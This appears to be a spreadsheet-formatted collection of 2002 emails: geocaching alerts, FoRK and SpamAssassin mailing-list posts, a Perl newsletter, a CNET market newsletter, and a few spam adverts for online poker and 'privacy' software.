 Tiger's Den by Texas tiger
 (Traditional Cache) (GC87D5) (33.14 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=34773
 8/31/2002 (Texas)
 Hike It or Bike It by Zorro
 (Multi-Cache) (GC874D) (41.81 miles S)
 http://www.geocaching.com/seek/cache_details.asp?ID=34637
 9/28/2002 (Texas)
 DFW Field Day #1 by loubob57
 (Event Cache) (GC8644) (47.92 miles W)
 http://www.geocaching.com/seek/cache_details.asp?ID=34372
 9/5/2002 (Texas)
 Pirates Booty by Nitehawker
 (Traditional Cache) (GC8A34) (50.51 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=35380
 9/2/2002 (Texas)
 The Gates of First Monday by GeoVamp
 (Virtual Cache) (GC8937) (54.01 miles SE)
 http://www.geocaching.com/seek/cache_details.asp?ID=35127
 9/2/2002 (Texas)
 Dallas Bound I-20 Cache by GeoVamp
 (Traditional Cache) (GC892E) (64.33 miles SE)
 http://www.geocaching.com/seek/cache_details.asp?ID=35118
 8/31/2002 (Texas)
 Sleepy Hollow by Nuttdriver by Nuttdriver
 (Traditional Cache) (GC8884) (71.17 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=34948
 9/4/2002 (Texas)
 Foot Bridge:  Parker Spring by Altie and oneoldman
 (Virtual Cache) (GC89BB) (96.65 miles S)
 http://www.geocaching.com/seek/cache_details.asp?ID=35259
 Your account name is 'lrosenman'.  If you would like to be removed from this
 list, please log into the web site and uncheck cache notifications through
 the "modify your account" link on your "my cache page".
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, Joseph S. Barrera III wrote:
 &gt; chris arkenberg wrote:
 &gt; &gt; Cheers, Adam.
 &gt; &gt;
 &gt; &gt; Perhaps people are starting to notice how profit motive drains the
 &gt; &gt; meaning out of their lives.
 &gt;
 &gt; And, having realized that, a lot of them are now having babies.
 &gt; I can't believe the number of friends at work who are now pregnant
 &gt; or have already just had their babies.
 The 9/11 boom is now well underway. Screaming newborns everywhere...
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: employment market for applied cryptographers? (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 -- 
 -- Eugen* Leitl &lt;a href="http://leitl.org"&gt;leitl&lt;/a&gt;
 ______________________________________________________________
 ICBMTO: N48 04'14.8'' E11 36'41.2'' http://eugen.leitl.org
 83E5CA02: EDE4 7193 0833 A96B 07A7  1A88 AA58 0E89 83E5 CA02
 ---------- Forwarded message ----------
 Date: Fri, 16 Aug 2002 02:23:05 +0100
 From: Adam Back &lt;adam@cypherspace.org&gt;
 To: Cryptography &lt;cryptography@wasabisystems.com&gt;
 Cc: Cypherpunks &lt;cypherpunks@minder.net&gt;, Adam Back &lt;adam@cypherspace.org&gt;
 Subject: employment market for applied cryptographers?
 On the employment situation... it seems that a lot of applied
 cryptographers are currently unemployed (Tim Dierks, Joseph, a few
 ex-colleagues, and friends who asked if I had any leads, the spate of
 recent "security consultant" .sigs, plus I heard that a straw poll of
 attenders at the codecon conference earlier this year showed close to
 50% out of work).
 Are there any more definitive security industry stats?  Are applied
 crypto people suffering higher rates of unemployment than general
 application programmers?  (From my statistically too small sample of
 acquaintances it might appear so.)
 If this is so, why is it?
 - you might think the physical security push following the world
 political instability worries following Sep 11th would be accompanied
 by a corresponding information security push -- jittery companies
 improving their disaster recovery and to a lesser extent info sec
 plans.
 - governments are still harping on the info-war hype, national
 information infrastructure protection, and the US Information Security
 Czar Clarke making grandiose pronouncements about how industry ought
 to do various things (that the USG spent the last 10 years doing it's
 best to frustrate industry from doing with it's dumb export laws)
 - even Microsoft has decided to make a play of cleaning up it's
 security act (you'd wonder if this was in fact a cover for Palladium
 which I think is likely a big play for them in terms of future control
 points and (anti-)competitive strategy -- as well as obviously a play
 for the home entertainment system space with DRM)
 However these reasons are perhaps more than cancelled by:
 - dot-com bubble (though I saw some news reports earlier that though
 there is lots of churn in programmers in general, that long term
 unemployment rates were not that elevated in general)
 - perhaps security infrastructure and software upgrades are the first
 things to be canned when cash runs short?  
 - software security related contract employees laid off ahead of
 full-timers?  Certainly contracting seems to be flat in general, and
 especially in crypto software contracts look few and far between.  At
 least in the UK some security people are employed in that way (not
 familiar with north america).
 - PKI seems to have fizzled compared to earlier exaggerated
 expectations, presumably lots of applied crypto jobs went at PKI
 companies downsizing.  (If you ask me over use of ASN.1 and adoption
 of broken over complex and ill-defined ITU standards X.500, X.509
 delayed deployment schedules by order of magnitude over what was
 strictly necessary and contributed to interoperability problems and I
 think significantly to the flop of PKI -- if it's that hard because of
 the broken tech, people will just do something else.)
 - custom crypto and security related software development is perhaps
 weighted towards dot-coms that just crashed.
 - big one probably: lack of measurability of security -- developers
 with no to limited crypto know-how are probably doing (and bodging)
 most of the crypto development that gets done in general, certainly
 contributing to the crappy state of crypto in software.  So probably
 failure to realise this issue or perhaps just not caring, or lack of
 financial incentives to care on the part of software developers.
 Microsoft is really good at this one.  The number of times they
 re-used RC4 keys in different protocols is amazing!
 Other explanations?  Statistics?  Sample-of-one stories?
 Adam
 --
 yes, still employed in sofware security industry; and in addition have
 been doing crypto consulting since 97 (http://www.cypherspace.net/) if
 you have any interesting applied crypto projects; reference
 commissions paid.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-08-31
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Two OSCON Lightning Talks Online
 +--------------------------------------------------------------------+
 | Two OSCON Lightning Talks Online                                   |
 |   posted by gnat on Friday August 30, @18:37 (news)                |
 |   http://use.perl.org/article.pl?sid=02/08/30/2238234              |
 +--------------------------------------------------------------------+
 [0]gnat writes "The first two OSCON 2002 lightning talks are available
 from [1]the perl.org website. They are Dan Brian on "What Sucks and What
 Rocks" (in [2]QuickTime and [3]mp3), and Brian Ingerson on "Your Own
 Personal Hashbang" (in [4]QuickTime and [5]mp3). Enjoy!"
 This story continues at:
     http://use.perl.org/article.pl?sid=02/08/30/2238234
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/30/2238234
 Links:
     0. mailto:gnat@frii.com
     1. http://www.perl.org/tpc/2002/
     2. http://www.perl.org/tpc/2002/movies/lt-1/
     3. http://www.perl.org/tpc/2002/audio/lt-1/
     4. http://www.perl.org/tpc/2002/movies/lt-2/
     5. http://www.perl.org/tpc/2002/audio/lt-2/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</si>
  <si>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Poker for money againts real players
</t>
  </si>
  <si>
    <t xml:space="preserve">Get your favorite Poker action at http://www.multiplayerpoker.net
 Play against real people from around the world for real money or just
 for fun.  Access one of the busiest poker rooms online.  We've dealt
 over 8 million hands!  Experience the best poker software available
 today featuring world class graphics, true random shuffling algorithms,
 and 24x7 customer service.  We've got a great selection of poker games
 for you to play such as:
 Hold'em, Omaha
 Omaha Hi/Lo
 7 Card Stud
 7 Card Stud Hi/Lo
 5 Card Stud
 Poker tournaments
 Sign up today and start playing with new &amp; old friends...download our free
 software now at http://www.MultiPlayerPoker.net
 Current Promotion:
    $50 Deposit Bonus! - 100% bonus!
    Daily High Hand - $250 Daily.
    Progressive Bad Beat Jackpot - $2,000.00 minimum with $100.00 added
 daily.
    Tournaments - Multiplayer shootouts.
 wish not to received any further e-mail from us please click
 http://www.centralremovalservice.com/cgi-bin/poker-remove.cgi
 (C4-ss2)3492QGau9-441Wmen129l19
 4486eyRl1-291l12
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hello lsb36 ! PERSONAL PRIVACY IS JUST A CLICK AWAY
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear lsb36 ,
 &lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face="Arial" size="2"&gt;YOUR INTERNET USAGE IS BEING TRACKED&lt;br&gt;
 You have no privacy protection.&lt;br&gt;
 Will your BOSS, WIFE or KIDS find out?&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font face="Arial"&gt;
 &lt;a href="http://www185.wiildaccess.com/"&gt;DOWNLOAD EZ INTERNET PRIVACY SOFTWARE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;
 &lt;br&gt;
 +++++++++++++++++++++++++++++++++++++++++++&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 You're in Serious Trouble - It's a Proven Fact!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Deleting &amp;quot;Internet Cache and History&amp;quot; will NOT protect you because any of&lt;br&gt;
 the Web Pages, Pictures, Movies, Videos, Sounds, E-mail, Chat Logs and&lt;br&gt;
 Everything Else you see or do could easily be recovered to Haunt you&lt;br&gt;
 forever! How would you feel if a snoop made this information public to your&lt;br&gt;
 Spouse, Mother &amp;amp; Father, Neighbors, Children, Boss or the Media? It could&lt;br&gt;
 easily Ruin Your Life! Solve all your problems and enjoy all the benefits of&lt;br&gt;
 an &amp;quot;As New PC&amp;quot;, EZ INTERNET PRIVACY SOFTWARE can Speed-Up your PC/Internet Browser,&lt;br&gt;
 reclaim Hard Disk space and Professionally Clean your PC in one easy mouse&lt;br&gt;
 click!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Did you know for example that every click you make on Windows 98 Start Menu&lt;br&gt;
 is logged and stored permanently on a hidden encrypted database within your&lt;br&gt;
 own computer?&lt;br&gt;
 Deleting &amp;quot;internet cache and history&amp;quot;, will not protect you... your PC is&lt;br&gt;
 keeping frightening records of both your online and off-line activity. Any&lt;br&gt;
 of the Web Pages, Pictures, Movies, Videos, Sounds, E-mail and Everything&lt;br&gt;
 Else you or anyone else have ever viewed could easily be recovered - even&lt;br&gt;
 many years later!&lt;br&gt;
 How would you feel if somebody snooped this information out of your computer&lt;br&gt;
 and made it public?&lt;br&gt;
 Do your children or their friends use your computers? What have they&lt;br&gt;
 downloaded and tried to delete?&lt;br&gt;
 Act now! And stop these files coming &amp;quot;back from the dead&amp;quot; to haunt you!&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial" size="5"&gt;&lt;a href="http://www185.wiildaccess.com/"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;to be removed &lt;a href="http://www185.wiildaccess.com/takemeoff.html"&gt;Click Here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [*TG0B]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Dave
 &gt; Long
 &gt; Sent: Thursday, August 22, 2002 11:12 AM
 &gt; To: fork@example.com
 &gt; Subject: RE: The Curse of India's Socialism
 &gt; 
 &gt; 
 &gt; 
 &gt; When I'd read that "getting legal title
 &gt; can take 20 years", when I believe that
 &gt; 1 year ought to be more than sufficient,
 &gt; (and helped by the Cairo reference) I'd
 &gt; assumed that we were talking about the
 &gt; urban poor.
 &gt; 
 &gt; If I see people living in mansions, or
 &gt; even in suburban subdivisions, I assume
 &gt; they didn't have too much trouble with
 &gt; their titles.
 Pg 177:
 In another country, a local newspaper, intrigued by our evidence of
 extralegal real estate holdings, checked to see if the head of state's
 official residence had a recorded title.  It did not.
 Pg 92:
 The value of land in the formal sector of Lima averages US$50 per square
 meter, whereas in the area of Gamarra, where a great deal of Peru's
 informal manufacturing sector resides, the value per square meter can go
 as high as US$3,000.
 ==========
 I'd have made the same assumption you did.  De Soto says that isn't
 correct.  You can find mansions that don't have title.  A lot of them,
 in fact.  But they can't be used for collateral for a loan, or otherwise
 participate as 'capital' because of their extra-legal status.
 &gt; &gt; Mr. Long, I think you'd particularly enjoy the De Soto work.
 &gt; 
 &gt; On the "to find" list.  Any chance of
 &gt; an explanation of that "Bell Jar" in
 &gt; the meantime?
 French historian Fernand Braudel (so Braudel's Bell Jar, not De Soto's)
 ==&gt;
 The key problem is to find out why that sector of society of the past,
 which I would not hesitate to call capitalist, should have lived as if
 in a bell jar, cut off from the rest; why was it not able to expand and
 conquer the whole of society? ... [Why was it that] a significant rate
 of capital formation was possible only in certain sectors and not in the
 whole market economy of the time? ... It would perhaps be teasingly
 paradoxial to say that whatever was in short supply, money certainly was
 not ... so this was an age where poor land was bought up and magnificent
 country residents built ... [How do we] resolve the contradiction ...
 between the depressed economic climate and the splendors of Florence
 under Lorenzo the Magnificent?
 --------------
 De Soto's theory is that the Bell Jar is formed when you segregate those
 who have *practical* access to legal property rights and those who do
 not.  The poor[1] have property -- lots and lots of property.  What they
 don't have is access to the systems where we turn property into capital
 and allow it to start growing.  Their property can only be exchanged
 with a small section of people who know them personally.
 [1] Actual poor people, not 'poor' Americans with a living standard that
 is the envy of most of the world.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --9amGYk9869ThD9tj
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Justin Mason &lt;jm@jmason.org&gt; [2002-08-29 17:00:12 +0100]:
 &gt; Well, my point is more that we should aim our rescoring algorithm so that
 &gt; a spam hits 5.0.    Any higher does us no good, as it means an FP is
 &gt; a lot harder to recover from, using compensation rules.
 Agreed.
 But I have always thought that the value 5 was not the best value.  It
 should have been 0.  I understand that initially only spammy scores
 were included.  But I believe the algorithm should be purely
 symmetrical and non-spammy negative values should also have been
 balancing out the spammy positive values, like they do in SA today.
 Then anything that was positive would be spam and anything negative
 would be non-spam.  (And I guess exactly zero is grey. :-) Today's
 choice of 5 just adds an offset.  Which I think cause people to assume
 things work differently than they do.
 Bob
 --9amGYk9869ThD9tj
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9bky50pRcO8E2ULYRAjI6AJwMoi8s2IUg4XpVAwCqpBC3gcd/cQCfepOm
 COS03YufMiFLSHhCZ8KkLxU=
 =YwM7
 -----END PGP SIGNATURE-----
 --9amGYk9869ThD9tj--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</si>
  <si>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Re: [SAdev] 2.41 release? 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Craig R.Hughes" said:
 &gt; Seems like a good idea.  We might get one of two other issues 
 &gt; raised tomorrow too once US people get back to work tomorrow and 
 &gt; start downloading 2.40 in earnest.
 yep, I reckon that's likely.
 BTW I'm hearing reports about problems resolving spamassassin.org.
 Anyone else noticing this?  if it's serious I'll see if I can get
 Mark Reynolds to add a 2ndary in the US, to go with the primaries
 in Oz.
 &gt; &gt;    - looks like there may be a razor2 issue
 I think this is a Razor bug/glitch triggered when file permissions
 don't allow its own log system to work.  At least that's the report
 I heard on the Razor list in the past...
 Theo, does it work now that you /dev/null'd the logfile?
 &gt; &gt;    - version number (says "cvs")
 &gt; &gt;    - tag tree as "Rel" this time too
 I won't bother tagging with Rel, IMO; I don't think we should
 rely on the version control system inside our code, so I've just
 put a line in Mail/SpamAssassin.pm instead.   I will of course
 tag with a release *label* though.
 --j.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</si>
  <si>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href="http://clickthru.online.com/Click?q=a0-11h8QQB7cNjxsKcUByjw2PB1s7iR"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href="http://clickthru.online.com/Click?q=b6-llkUQCKVBmZ9ju5T_PUCch20Lg4R" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsQXvJS0OGyXYHRf_uaHkrR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDxnLxFSC7kPhB7mxUT9AiR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwH2E6omcY6DmLwgkaZmRPR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrwX4R7AeWBwhq6GOxuYznR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav --&gt;
 &lt;p&gt;
 &lt;!-- tech winners --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_win.gif" width=160 height=20 alt="Tech Winners"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58sviBXvpU1xmYgHobjqmeR" &gt;STIZ&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.5&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;45.77%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcdj2d53QT23_tvVyn4IcgyR" &gt;IIJI&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.75&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;35.71%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpGf4htn73VX4RVXFO5JSFR" &gt;BOYD&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.24&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;35.03%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKc1ZAbqV96fez6pa6cIJuR" &gt;INPH&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.94&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;31.25%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZG-Vz-PiCRYG8Y0gSPZxsR" &gt;EBSC&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.0&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;26.00%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech winners --&gt;
 &lt;br&gt;
 &lt;!-- tech losers --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_lose.gif" width=160 height=20 alt="Tech Losers"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J2r6jzkOFkUMBXB6W5WWlR" &gt;NSIT&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;13.36&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-43.72%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMrKK45Pg5HSCN0U7nQUD4R" &gt;ITRI&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;14.82&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-32.79%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKF7rMd7i9AE64qDAwrPGrR" &gt;GZBX&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.28&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-25.49%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOIMbY36i8MKE-nFr99H2iR" &gt;TTEK&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;10.4&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-24.03%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWMAbMglzxGZP85eXsJh-PR" &gt;GDYS&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.37&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-23.20%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech losers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href="http://clickthru.online.com/Click?q=f2-OZVTQUwPRrj3g_v0pvVdi5Z7ednR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjTZPy_0LEg3F-erCpGY9iR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQTqz5OQDKRl28NRQSnqQPR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQi8Bm39RKDFWVhZSgRXBnR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZx2oD9T3EOiJGu_NEsnEuR"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18,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href="http://clickthru.online.com/Click?q=5c-BnjPIZnWYPmQ58653xlZk0f-IosR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8409.49 &amp;nbsp;&lt;font color=#cc0000&gt;-132.99&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZXeNnxzdgqwuBXvl3NU2FR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1356.95 &amp;nbsp;&lt;font color=#cc0000&gt;-40.30&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJm04zepRSSjaeTldfVpf4R" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;881.56 &amp;nbsp;&lt;font color=#cc0000&gt;-24.48&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIm1Af0z890dAVJ9PZAKTrR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;982.84 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#cc0000&gt;-24.59&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;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lose again with Seibel earnings miss, AOL questions&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Siebel Systems fell short of Wall Street's earnings expectations and offered a worse-than-expected outlook, helping to depress technology shares Thursday.
 &lt;p&gt;
 Despite a forecast from IBM in line with analyst expectations, investors seemed more focused on reports of a possible management shake-up at AOL Time Warner and on a Washington Post story questioning accounting methods at America Online. CNET's Tech index shed 24.59 points, or 2.45 percent, to close at 982.84. The tech-heavy Nasdaq composite index fell 40.30 points, or 2.88 percent, to close at 1,356.95.
 &lt;p&gt;
 Amid news The Conference Board's index of leading economic indicators held steady in June, broader markts also headed south. The Dow Jones industrials dropped 133.0 points, or 1.56 percent, to close at 8,409.4. The S&amp;P 500 slid 24.48 points, or 2.7 percent, to close at 881.56--another multi-year low.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href="http://clickthru.online.com/Click?q=b0-NZmfQQJQNJiYfWQdxQMKtNX8PQiR" &gt;AOL used unconventional business practices-Post &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 America Online Inc. boosted its revenue figures through unconventional deals from 2000 to 2002, before and after its acquisition of Time Warner Inc., the Washington Post reported on Thursday.
 A chart printed in conjunction with the Post article shows a total of $270.1 million in unconventional deals.&lt;br&gt;&lt;B&gt;AOL TIME WARNER INC 12.45 -5.03% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzO4TxlW3kazSROUJEymxqPR" &gt;IBM posts sharp drop in quarterly profits &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 International Business Machines Corp. on Wednesday said it eked out a second-quarter profit of just a few pennies a share as the world's largest computer maker took a $1.4 billion charge to exit money-losing businesses and cut jobs.
 But even without the big charge, earnings at IBM, which sells everything from computer software to microchips to computer services, fell sharply as corporations concerned about their own bottom lines cut back on technology spending.&lt;br&gt;&lt;B&gt;INTL BUSINESS MACHINES 72.05 1.92% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEJi8jgsNzvpmtTwxp6DtrR" &gt;Nokia sees slight rise in Q3 handset sales vs Q2 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
